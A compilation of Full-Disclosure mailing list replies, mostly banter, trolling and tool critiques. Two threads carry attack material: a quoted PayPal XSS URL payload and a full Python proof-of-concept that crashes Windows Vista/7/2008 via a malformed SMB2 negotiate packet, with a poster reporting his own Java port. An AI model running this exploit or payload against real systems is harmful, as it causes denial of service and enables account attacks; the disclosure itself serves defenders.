Re: [Full-disclosure] [SPAM] Re: Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration
On 2/4/2014 6:36 PM, Mark Litchfield wrote: On 2/4/2014 3:13 PM, security curmudgeon wrote: : This is not the behavior of the site as of 48 hours ago. : Let me check. Normal registration should also be available ? Infact I : will remove the registration. : : The purpose of this whole registration in the first place was to allow : for future postings I am going to make later this week that would only : be available to registered users. Not necessarily vulnerabilities, but : useful stuff for pentesting. Also all registered users would be given : a 48 hours head start on any new vulnerabilities that I post in the : future. Which is great, but I strongly recommend you allow a site-specific registration for such purposes. Giving up one of the two dominant social media accounts for it is excessive. I should add, I am all for constructive criticism. But a public forum is not really the place. Feel free to email me directly. Yes, it is. This is a security forum. Your authentication mechanism is a major security issue. The damn thing should get its own CVE. Think about it and you'll see the point. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
On 8/28/2011 6:52 PM, Juan Sacco wrote: This isnt a company making a big product, Im doing this because I like doing it. Good for you. I think that is great. But you are pretending to be a big company. Stop that. I am happy to see you removed that silly donation-for-download scheme. I'm not forcing you to use my software, if you don't like it please don't waste bandwith on it. Fantastic advice. We are working on a JAVA version in order to support multi-plataform, and because I really like to JAVA I did too, until I learned how to program. Oracle's purchase/murder also hastened my departure. Might I suggest C++/Qt? :-) Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] International Master In Computer Security and Cyberwarfare
How can you expect to be taken seriously when your Web site doesn't have pictures of attractive, multi-ethnic women in business attire pointing at holographic displays of random binary digits? Bah! Randy On 5/23/2011 10:10 AM, Mastere NIS wrote: Our master “/Network and Information security/” (NIS) program is a springboard to a variety of exciting careers in security information ranging from computer network administrator, IT security expert or cyberwarfare expert for the Department of Defense to security officer in charge of the IT security in an international firm. Through theoretical and practical study, the NIS program will provide you with the skills and knowledge you need to work in today’s fast moving information security landscape. It is the only program of this kind in France as it offers a different and new approach to information security by considering the attacker’s view point. This program also offers you insight into advanced study options such as active auditing or cyber warfare techniques and concepts, helping you to choose your career path. Our program emphasizes hands-on, practical training providing you with an additional learning opportunity that is best-suited for real world demands. The Specialized Master “NIS” is a Post-master professional degree called in French “mastère spécialisé”. It is a very specialized and highly technical one-year study course taught in English. This program is aimed at international students with a bachelor’s Degree or equivalent in the following related fields: computer science, computer engineering, applied mathematics. It is opened to higher level students and experienced engineers in IT as well. More information on the homepage https://sites.google.com/site/esieanismaster/of the International Master. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Stuxnet
On 05/01/2011 01:38 PM, satyam pujari wrote: *request* Hello FD, Can anyone handle this guy please ? Allow me to spin this broken record again... Censorship = Bad E-Mail Filters = Good Take control of your inbox and don't rely on others! Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL Capable NetCat and more
On 3/27/2011 4:29 PM, Dan Tulovsky wrote: Beside that, scnc is written in pure-Perl, and is easily modifiable by anyone. Such really simple (dumb?) stuff should not be written in low-level languages such as C. You can't be serious... Shirley, he is. Perl is shite. It's a dependency hell, it lacks the logic of C/C++ and is interpreted (as pointed out by others). Any code base can be modifiable by anyone - as long as it is open sourced. Don't get me wrong, I'm not criticizing the product. I think reinventing the wheel in lesser performing methods is great. Just don't disregard C. To be honest, in my code auditing days, it was SO much easier to find flaws in C/C++ than Perl, because Perl is just messy and ugly. Something looks wrong, but it's right. Uggh! But if you need to write something quick for an easy task, by all means, hit the Perl. It's like using Java to write large scale enterprise products. Who the hell? Why? Portability is nice, but performance is better. Java belongs in the small-scale realm of applications. Grumble grumble. Get off my lawn. Back to the lair :-) Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Your email message was blocked
On 3/30/2011 11:31 PM, r...@bellaliant.ca wrote: The following email message was *blocked* by Bell Aliant Content Filtering Device: *From:* ra...@procyonlabs.com *To:*peter.mo...@bellaliant.ca *Subject:* Re: [Full-disclosure] SSL Capable NetCat and more *Message:* B4d93f5990001.0001.0003.mml Because it may contain *unacceptable language*, or *inappropriate material*. Please remove any unacceptable or inappropriate language and resend the message. The blocked email will be automatically deleted after *5 days. * Content Rule: Policy Management (Inbound) : Block Common Mild Profanity r...@bellaliant.ca F**K YOU. Here's a nickel - get yourself a real mail server. Randy -- Disclaimer: By sending an email to ANY of my addresses you are agreeing that: 1. I am, by definition, the intended recipient 2. All information in the email is mine to do with as I see fit 3. I will take the contents as representing the views of your company 4. If your email is an Out of Office reply on a mailing list, I will social engineer your company 5. This notification overrides any disclaimer or statement of confidentiality that may be included on your message Further, you understand that if any of the following conditions are met that you are indeed, a bag of douche: 1. Your message identifies the device you sent it from 2. You messed up the thread by top-posting ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
On 3/29/2011 9:13 PM, runlvl wrote: Insecurity Research is happy to announce the release of version 2.5, get it now while is still hot ! Insect Pro 2.5 is a penetration security auditing and testing software solution designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities. We’re always working to improve Insect Pro and now the users obtain a new feature: A fully automated active web application security reconnaissance tool. Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA We invite you to take a visual tour where you can find screenshots and videos, visit us now at http://www.insecurityresearch.com There is no fixed price to get a copy, you can obtain the full version by making a minimum donation to keep us coding. We are really thankful with the community! I keep getting this error when trying to download: Please enter an amount greater than zero. Can you fix that so I can test out the software. I'm really curious about how much code was lifted from other projects. Nice logo though! Thanks, Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
On 3/29/2011 9:13 PM, runlvl wrote: Insecurity Research is happy to announce the release of version 2.5, get it now while is still hot ! snip Oh! And you list the Dept. of Energy as a customer. I used to work there, and still talk to a lot of the security offices for various locations. They've never heard of it. Also, did you get clearance from the DoE's Office of Public Affairs to list them as a customer? They get touchy about that sort of stuff. Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown
Thought this would be appropriate :-) http://xkcd.com/149/ On 2/15/2011 4:00 PM, Eyeballing Weev wrote: What do you expect from a woman? Rebecca, kindly make me a sandwich On 02/15/2011 03:44 PM, Cal Leeming [Simplicity Media Ltd] wrote: I did apologise, no need to drag it out into the yard and beat it with a stick lol. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenBSD Paradox
On 12/15/2010 5:00 PM, BMF wrote: 2010/12/15 musnt live musntl...@gmail.com: What is this time to stop the press! This fake broken English schtick is really stupid and annoying. Knock it off. In the meantime you are kill filed. I suggest everyone else do the same as nothing useful has ever come of this person. First, obligatory: http://www.pulledbyakite.com/funnypics/s_troll.jpg Second, if you can't take a joke: http://www.pulledbyakite.com/funnypics/gtfoti.png Now let's hug and move on. Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows is 100% self-modifying assembly code?(Interesting security theory)
On 12/10/2010 10:10 AM, John Horn wrote: Is this a joke? -- John Horn City of Tucson, IT Department Network Services (Network security) Phone: (520) 837-6036 -- CONFIDENTIALITY NOTICE: If you have received this email in error, please immediately notify the sender by e-mail at the address shown. This email transmission may contain confidential information. This information is intended only for the use of the individual(s) or entity to whom it is intended even if addressed incorrectly. Please delete it from your files if you are not the intended recipient. Thank you for your compliance, time and attention to this matter. snip A top-post, bogus legal notice AND an office phone #. Social engineers - unite! Might want to think about that a little. And if you have to ask whether something is a joke, then the troll was successful. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Paypal XSS Vulnerability - Resolved
I find it humorous that an organization that pretends to be a bank and regularly steals money from its members has the balls to distribute a PayPal Responsible Disclosure Policy. Good luck with that. Randy On Fri, March 26, 2010 10:49 pm, Orbeton, Jon wrote: All: The XSS vulnerability reported below was addressed at approximately 17:45 PDT today. For information about how to report security issues to PayPal, please refer to the PayPal Responsible Disclosure Policy documented here: https://www.paypal.com/cgi-bin/webscr?cmd=xpt/cps/securitycenter/general/ReportingSecurityIssues-outside Site security issues should be reported to: sitesecur...@paypal.com All reports will be handled professionally and quickly. A PGP key is available at the URL above. Thanks, Jon Orbeton PayPal, an eBay Company From: Wesley Kerfoot wjak56 () gmail com Date: Fri, 26 Mar 2010 15:46:09 -0400 Paypal is affected by an XSS vulnerability where it fails to validate input for the following url: https://www.paypal.com/xclick/business= One can add arbitrary javascript with no need for any filter evasion. https://www.paypal.com/xclick/business=script alert(xss); /script As far as I know only the above url is affected. All of the usual XSS attacks will work with this. Cheers. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SecurityFocus to partially shut down
On Fri, March 12, 2010 1:45 pm, Michal Zalewski wrote: http://www.securityfocus.com/news/11582 While the news portal section of SecurityFocus will no longer be offered, we think our readers will be better served by this change as we combine our efforts with Symantec Connect and continue to provide a valuable service to the community. http://www.symantec.com/connect/ In other words, RIP :-/ Who didn't see this coming? Symantec... OM NOM NOMMING companies since 1984. Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How I become Vice President of Security at Yahoo! 1999-2005.
Decent attempt at trolling. Some beginner mistakes, but the message was relayed as intended (I'm sure). Comments inline. On Fri, February 19, 2010 6:45 pm, John Q Public wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Greetings. I've been holding this one back for a while. It's been eating at my skin. I was just an intern at the time, but I'd get the mail, copy the text, delete his mail, and send the mail to my supervisor, authored by me. Clarify the type of mail - it adds texture to the troll. I still remember the friendships I made at Yahoo. The cute girlfriends I have and how it changed my life. I remember I was just some office kid opening up emails in outlook 2000. But I risen to be so much more. This mysterious person helped me do it. Perhaps some reflection on the type of assistance? Also, Yahoo! employees do not have cute girlfriends. Eventually, I was promoted up Vice President of Security at Yahoo! and made nearly six figures a year. The salary figure is off. Take into consideration the role, size of organization and geographical location. Then again, the experience you detailed would possibly justify this low figure. This is what I did. And I told no one. All I know is there is a kid whose advice I took credit for and he is the key factor for my success in life. I live in a $500k condo in Mountain View. Wife, 2 kids, and a Lexus (2009 Hybrid, Italian leather seats, TV in backseat for the kids). That amount in Mountain View would get you 20x20 in someone's basement. Also, they don't make seats with the skin of Italian people. Some ethical thing. I just wanted to let you know that the security tips helped. I feel pretty guilty for flat out taking credit for all his work though. I just had to get it off my chest. Thank you so much, if you read this list. You've touched my life. -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 Hmm. Must be legit. It's signed! Okay, break time is over. Back to code monkeying. Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Peiter Mudge Zatko petition to be named U.S. Cybersecurity Chief
The Sp3ctacle wrote: http://www.ipetitions.com/petition/mudge4cyberczar/index.html This petition is posted in support for the nomination of Peiter Zatko (aka mudge) to the President's post of Cybersecurity Chief. We've all seen how effective past efforts have been regarding this initiative, and realize the importance of nominating someone who understands not only all facets of cybersecurity, but has garnered the respect of both peers and adversaries in the space. Dr. Zatko's bio is available at: http://en.wikipedia.org/wiki/P... and http://www.allbusiness.com/gov... Yeah, because if it is one thing he wants, it is a powerless figurehead position of bureaucracy and politics. There is a reason why nobody stays in the high level (US) information security roles for long. Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
It's fun :-) On Mon, September 14, 2009 12:14 pm, D-vice wrote: You wrote an exploit in java *head explodes* On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux ra...@procyonlabs.comwrote: After testing my version of the exploit (using Java instead of Python) I tried it against a Windows Server 2008 R2 installation - it went down. http://www.procyonlabs.com/software/smb2_bsoder Randy laurent gaffie wrote: Advisory updated : = - Release date: September 7th, 2009 - Discovered by: Laurent Gaffié - Severity: High = I. VULNERABILITY - Windows Vista, Server 2008 R2, 7 RC : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. II. BACKGROUND - Windows vista and newer Windows comes with a new SMB version named SMB2. See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0 for more details. III. DESCRIPTION - [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue: KB942624 (MS07-063) Installing only this specific update on Vista SP0 create the following issue: SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication. IV. PROOF OF CONCEPT - Smb-Bsod.py: #!/usr/bin/python #When SMB2.0 recieve a char in the Process Id High SMB header field #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error from socket import socket host = IP_ADDR, 445 buff = ( \x00\x00\x00\x90 # Begin SMB header: Session message \xff\x53\x4d\x42 # Server Component: SMB \x72\x00\x00\x00 # Negociate Protocol \x00\x18\x53\xc8 # Operation 0x18 sub 0xc853 \x00\x26# Process ID High: -- :) normal value should be \x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54 \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31 \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00 \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57 \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61 \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e \x30\x30\x32\x00 ) s = socket() s.connect(host) s.send(buff) s.close() V. BUSINESS IMPACT - An attacker can remotly crash any Vista/Windows 7 machine with SMB enable. Windows Xp, 2k, are NOT affected as they dont have this driver. VI. SYSTEMS AFFECTED - [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 R2, Windows 7 RC. VII. SOLUTION - No patch available for the moment. Close SMB feature and ports, until a patch is provided. Configure your firewall properly You can also follow the MS Workaround: http://www.microsoft.com/technet/security/advisory/975497.mspx VIII. REFERENCES - http://www.microsoft.com/technet/security/advisory/975497.mspx http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx IX. CREDITS - This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com http://gmail.com X. REVISION HISTORY - September 7th, 2009: Initial release September 11th, 2009: Revision 1.0 release XI. LEGAL NOTICES - The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. XII.Personal Notes - Many persons have suggested to update this advisory for RCE and not BSOD: It wont be done, if they find a way to execute code, they will publish them advisory. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
Scratch that - the version of 2008 I had wasn't an official R2 release. So original reports still hold. It didn't crash my R2 build 7600. Laurent, et al, has this been tried against an Itanium machine? Just curious. Nobody at work will let me test the exploit against their Itanium servers. Randy On Mon, September 14, 2009 12:02 am, Randal T. Rioux wrote: After testing my version of the exploit (using Java instead of Python) I tried it against a Windows Server 2008 R2 installation - it went down. http://www.procyonlabs.com/software/smb2_bsoder Randy laurent gaffie wrote: Advisory updated : = - Release date: September 7th, 2009 - Discovered by: Laurent Gaffié - Severity: High = I. VULNERABILITY - Windows Vista, Server 2008 R2, 7 RC : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. II. BACKGROUND - Windows vista and newer Windows comes with a new SMB version named SMB2. See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0 for more details. III. DESCRIPTION - [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue: KB942624 (MS07-063) Installing only this specific update on Vista SP0 create the following issue: SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication. IV. PROOF OF CONCEPT - Smb-Bsod.py: #!/usr/bin/python #When SMB2.0 recieve a char in the Process Id High SMB header field #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error from socket import socket host = IP_ADDR, 445 buff = ( \x00\x00\x00\x90 # Begin SMB header: Session message \xff\x53\x4d\x42 # Server Component: SMB \x72\x00\x00\x00 # Negociate Protocol \x00\x18\x53\xc8 # Operation 0x18 sub 0xc853 \x00\x26# Process ID High: -- :) normal value should be \x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54 \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31 \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00 \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57 \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61 \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e \x30\x30\x32\x00 ) s = socket() s.connect(host) s.send(buff) s.close() V. BUSINESS IMPACT - An attacker can remotly crash any Vista/Windows 7 machine with SMB enable. Windows Xp, 2k, are NOT affected as they dont have this driver. VI. SYSTEMS AFFECTED - [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 R2, Windows 7 RC. VII. SOLUTION - No patch available for the moment. Close SMB feature and ports, until a patch is provided. Configure your firewall properly You can also follow the MS Workaround: http://www.microsoft.com/technet/security/advisory/975497.mspx VIII. REFERENCES - http://www.microsoft.com/technet/security/advisory/975497.mspx http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx IX. CREDITS - This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com http://gmail.com X. REVISION HISTORY - September 7th, 2009: Initial release September 11th, 2009: Revision 1.0 release XI. LEGAL NOTICES - The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. XII.Personal Notes - Many persons have suggested to update this advisory for RCE and not BSOD: It wont be done, if they find a way to execute code, they will publish them advisory. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
After testing my version of the exploit (using Java instead of Python) I tried it against a Windows Server 2008 R2 installation - it went down. http://www.procyonlabs.com/software/smb2_bsoder Randy laurent gaffie wrote: Advisory updated : = - Release date: September 7th, 2009 - Discovered by: Laurent Gaffié - Severity: High = I. VULNERABILITY - Windows Vista, Server 2008 R2, 7 RC : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. II. BACKGROUND - Windows vista and newer Windows comes with a new SMB version named SMB2. See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0 for more details. III. DESCRIPTION - [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue: KB942624 (MS07-063) Installing only this specific update on Vista SP0 create the following issue: SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication. IV. PROOF OF CONCEPT - Smb-Bsod.py: #!/usr/bin/python #When SMB2.0 recieve a char in the Process Id High SMB header field #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error from socket import socket host = IP_ADDR, 445 buff = ( \x00\x00\x00\x90 # Begin SMB header: Session message \xff\x53\x4d\x42 # Server Component: SMB \x72\x00\x00\x00 # Negociate Protocol \x00\x18\x53\xc8 # Operation 0x18 sub 0xc853 \x00\x26# Process ID High: -- :) normal value should be \x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54 \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31 \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00 \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57 \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61 \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e \x30\x30\x32\x00 ) s = socket() s.connect(host) s.send(buff) s.close() V. BUSINESS IMPACT - An attacker can remotly crash any Vista/Windows 7 machine with SMB enable. Windows Xp, 2k, are NOT affected as they dont have this driver. VI. SYSTEMS AFFECTED - [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 R2, Windows 7 RC. VII. SOLUTION - No patch available for the moment. Close SMB feature and ports, until a patch is provided. Configure your firewall properly You can also follow the MS Workaround: http://www.microsoft.com/technet/security/advisory/975497.mspx VIII. REFERENCES - http://www.microsoft.com/technet/security/advisory/975497.mspx http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx IX. CREDITS - This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com http://gmail.com X. REVISION HISTORY - September 7th, 2009: Initial release September 11th, 2009: Revision 1.0 release XI. LEGAL NOTICES - The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. XII.Personal Notes - Many persons have suggested to update this advisory for RCE and not BSOD: It wont be done, if they find a way to execute code, they will publish them advisory. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Slashdot hacked?
On Thu, July 23, 2009 5:47 pm, Compsec Guy wrote: What's wrong with Slashdot today? Nothing. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Black Hat USA Videos available to D/L
On Mon, March 30, 2009 8:14 pm, jmoss wrote: Hey Full Disclosure, I am proud to announce that the audio and video from BH USA 2008 is now available for free download, and is in several formats, the first of which is a large, hi-res format with video-sync speaker and presentation: https://www.blackhat.com/html/bh-usa-08/bh-usa-08-archive.html snip .m4v? Really? Oh Jeff. Nobody uses Macs. We like software freedom. Come back to the DC-stuff mailing list so we can discuss this :-) Off to start converting videos... Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!
On Tue, November 25, 2008 1:44 am, Memisyazici, Aras wrote: SSNNIIPP OK... Maybe I'm going a bit extreme, but WTH?! Am I the only one who is interpreting this, this way? Really? When has releasing a solution to a problem 7 years later ever been acceptable? May not be acceptable, but it is standard practice with some software companies. They're not closed-source because they care about security. They're closed-source because they're lazy (and/or don't care about anything but quick money). Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v not a troll
On Mon, September 15, 2008 1:08 pm, n3td3v wrote: On Mon, Sep 15, 2008 at 5:49 PM, [EMAIL PROTECTED] wrote: On Mon, 15 Sep 2008 08:09:12 BST, n3td3v said: n3td3v is outspoken but hes not a troll. he is a serious security researcher with his own mailing list. ... and then someone hurtfully says im a troll, what does this mean? It means that if you don't understand what a troll is, It means posting inflammatory comments on purpose to get a response, yet i've never done this ever, So I can't be a troll, because I've never purposely set out to post something just to get a reaction. Anything I say is my actual opinion, so accept it or unsubscribe. It is Full-Disclosure, not Opinion-Disclosure. Sure, you can do it. Just expect the appropriate responses. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] security news on cnet???
On Tue, Sep 2, 2008 at 11:07 AM, n3td3v [EMAIL PROTECTED] wrote: you've not post any security news all week, what's going on cnet??? is the journalist that does the security news off ill??? :( yours, cnet fan surely they will cave to pressure from the global powers of the netdev group. i bet they'll be a story up for comment pretty soon now. randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DIE IN A FIRE post
On Wed, August 27, 2008 11:34 am, Simon Smith wrote: Hi Mike, Next time you decide to say something stupid make sure that you do it anonymously. Michael C Shirk Home: 4205 Chapel Gate Pl Belcamp, MD 21017-1636 (410) 273-1377 M. Shirk wrote: DIE IN A FIRE !!!1!1! Shirkdog ' or 1=1-- http://www.shirkdog.us Simon: A: Because it messes up the order in which people normally read text. Q: Why is top-posting such a bad thing? A: Top-posting. Q: What is the most annoying thing in e-mail? Shirkdog: Seems we share a state. Ask the evil hacker Simon for my address - come on over. I'll back a cake. Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] simple phishing fix
On Tue, July 29, 2008 2:31 pm, [EMAIL PROTECTED] wrote: You might eliminate phishing but there are occasionally messages from people at these institutions also. This sort of thing is in essence allowing phishers a denial of service attack against anyone they choose to make themselves a nuisance with. I am not well pleased with any bank authentication I have seen so far personally; seems to me finance-related messages should be authenticated both ways and preferably a confirming authentication to demonstrate the subject agrees with the transaction should be done before such are accepted. That kind of thing would be hard to spoof and if done right pretty useless to someone who could record entire transactions. As for email, judge by its content. This posting for example will do nothing to your money, sells you nothing. Nor does it ask any information of you. If it were spoofed it would be harmless. Glenn Everhart But it is from Chase and nothing good comes from Chase ;-) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
On Fri, July 4, 2008 7:02 am, Panda Security Response wrote: Please allow at least one week for us to respond before public disclousure. We only received this information a few days ago. Regards, -- Pedro Bustamante Senior Research Advisor Panda Security It takes a week to hit the respond button? At least be polite and read your mail, perhaps with a quick stand by, we're looking into it response so folks think you care. We are an impatient lot in this community. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Snort Signature to detect credit cards
